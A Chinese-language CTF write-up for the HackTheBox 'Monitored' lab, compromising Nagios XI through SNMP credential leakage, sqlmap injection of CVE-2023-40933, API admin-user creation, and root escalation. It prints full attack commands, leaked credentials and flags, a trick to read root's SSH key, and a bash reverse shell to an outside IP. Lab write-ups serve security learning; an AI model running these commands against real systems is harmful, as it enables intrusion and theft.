[Meachines][Medium]Monitored

2024-05-12 581 0

Main

$ nmap -p- -sC -sV 10.10.11.248 --min-rate 1000

[Meachines][Medium]Monitored插图

# echo "10.10.11.248 nagios.monitored.htb" >>/etc/hosts

[Meachines][Medium]Monitored插图1

[Meachines][Medium]Monitored插图2

[Meachines][Medium]Monitored插图3

  • Nagios 是一个流行的开源网络监控系统,用于监控计算机系统、网络设备、服务以及应用程序。它可以实时监控主机和服务的状态,及时发现和报告问题,从而帮助管理员快速诊断和解决网络和系统方面的故障。

通过漏洞库查询到存在一个SQL注入
CVE-2023–40933

[Meachines][Medium]Monitored插图4

[Meachines][Medium]Monitored插图5

[Meachines][Medium]Monitored插图6

$ nmap -sU -sC -sV 10.10.11.248 --min-rate 1000

[Meachines][Medium]Monitored插图7

  • SNMP(Simple Network Management Protocol)是一种用于管理和监控网络设备的标准协议。它允许网络管理员远程监视网络设备的运行状态、收集性能数据、配置设备以及诊断问题。通过SNMP,管理员可以从网络设备(如路由器、交换机、服务器等)中获取信息,也可以向这些设备发送控制命令。SNMP使用一个基于文本的数据格式来交换信息,通常被用于监控和管理大型企业网络。

$ snmpwalk -v2c -c public nagios.monitored.htb
从结果中发现了了登录凭据svc XjH7VCehowpR1xZB

[Meachines][Medium]Monitored插图8

  • snmpbulkwalk 是一个基于命令行的工具,用于执行 SNMP(Simple Network Management Protocol)的批量查询。它通常用于获取大量的网络设备信息,比如路由器、交换机等。与标准的 snmpwalk 工具相比,snmpbulkwalk 通过在单个请求中获取多个变量来提高效率,减少了网络交互的次数,因此对于大型网络或者需要获取大量信息的情况下更加高效。snmpbulkwalk 工具允许用户指定要查询的设备、OID(Object Identifier)以及相关的认证参数,以便获取所需的网络设备信息

https://nagios.monitored.htb/nagiosxi/includes/components/ccm/index.php

[Meachines][Medium]Monitored插图9

https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php

[Meachines][Medium]Monitored插图10

页面存在

$ curl -X POST -k -L -d 'username=svc&password=XjH7VCehowpR1xZB' https://nagios.monitored.htb/nagiosxi/api/v1/authenticate/

我们可以通过这个接口来获取TOKEN

[Meachines][Medium]Monitored插图11

$ sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch --dbs

[Meachines][Medium]Monitored插图12

$ sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi --tables

[Meachines][Medium]Monitored插图13

$ sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi -T xi_users --dump

[Meachines][Medium]Monitored插图14

我们将通过这个APIKEY来添加一个用户

$ curl -XPOST 'https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1' -d 'username=s-h4ck13&password=maptnh&[email protected]&name=mapth&auth_level=admin' -k
[Meachines][Medium]Monitored插图15

登录后台https://nagios.monitored.htb/nagiosxi/login.php
如果是真实环境在这里其实可在SQL数据库中修改管理员的邮箱,让后忘记密码,这样发送的重置密码就会到攻击者邮箱验证修改
username:s-h4ck13
password:maptnh

[Meachines][Medium]Monitored插图16

Configure->Core Config Manager->Commands->Add New

[Meachines][Medium]Monitored插图17

[Meachines][Medium]Monitored插图18

[Meachines][Medium]Monitored插图19

选择命令后,点击右下角Run Check Command

[Meachines][Medium]Monitored插图20

[Meachines][Medium]Monitored插图21

[Meachines][Medium]Monitored插图22

User Flag

/home/nagios$ cat user.txt

[Meachines][Medium]Monitored插图23

39ea0ded58be8ba1cf84a3f332e5757e

Root Flag

$ sudo -l

[Meachines][Medium]Monitored插图24

方法1

$ cat /usr/local/nagiosxi/scripts/components/getprofile.sh

我们将内容复制下来分析

[Meachines][Medium]Monitored插图25

在277行发现一个文件我们有权限进行修改

[Meachines][Medium]Monitored插图26

[Meachines][Medium]Monitored插图27

$ cat /usr/local/nagios/etc/nagios.cfg

[Meachines][Medium]Monitored插图28

$ vi /usr/local/nagios/etc/nagios.cfg
把log_file=/usr/local/nagios/var/nagios.log修改成log_file=/root/.ssh/id_rsa

[Meachines][Medium]Monitored插图29

$ sudo /usr/local/nagiosxi/scripts/components/getprofile.sh 1

[Meachines][Medium]Monitored插图30

[靶机]

$ cd /usr/local/nagiosxi/var/components
$ /usr/local/nagiosxi/var/components$ python -m http.server 7890

[Kali]

$ wget http://10.10.11.248:7890/profile.zip
$ unzip profile.zip
目录profile-1714316974/nagios-logs/nagios.txt已经读取到root用户的私钥
[Meachines][Medium]Monitored插图31

$ cd profile-1714316974/nagios-logs;mv nagios.txt id_rsa;chmod 400 id_rsa;ssh -i id_rsa [email protected]

[Meachines][Medium]Monitored插图32

4c45fe55bd0f2f1364c07760c92af9d8

方法2

[靶机]

$ ls /usr/local/nagiosxi/scripts/ -la

[Meachines][Medium]Monitored插图33

$ cd /usr/local/nagiosxi/scripts/

$ cat manage_services.sh

用于操作服务的

[Meachines][Medium]Monitored插图34

我们可以控制启动npcd服务来反弹一个shell

  • npcd 是 Nagios XI 中的一个守护进程(daemon),用于执行网络设备的自动发现和监控。Nagios 是一个流行的开源网络监控工具,Nagios XI 是 Nagios 的商业版本,提供了更多功能和易用性。

[Meachines][Medium]Monitored插图35

$ systemctl status npcd

找到服务位置

[Meachines][Medium]Monitored插图36

$ sudo ./manage_services.sh stop npcd

$ systemctl status npcd

[Meachines][Medium]Monitored插图37

$ rm /usr/local/nagios/bin/npcd

我们可以手动删除这个npcd,

[Meachines][Medium]Monitored插图38

我们可以看之前的权限,我们所在组是具有高权限的,可以进行删除该文件

[Meachines][Medium]Monitored插图39

$ vi /usr/local/nagios/bin/npcd
劫持该服务

#!/bin/bash
 bash -i >& /dev/tcp/10.10.16.23/10034 0>&1

$ chmod +x /usr/local/nagios/bin/npcd

方法2-1

$ sudo ./manage_services.sh start npcd

[Meachines][Medium]Monitored插图40

[Meachines][Medium]Monitored插图41

4c45fe55bd0f2f1364c07760c92af9d8

方法2-2

值得庆幸的是在/usr/local/nagiosxi/scripts/components/getprofile.sh调用了这个可执行文件

[Meachines][Medium]Monitored插图42

$ sudo /usr/local/nagiosxi/scripts/components/getprofile.sh 1

[Meachines][Medium]Monitored插图43

[Meachines][Medium]Monitored插图44

4c45fe55bd0f2f1364c07760c92af9d8


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论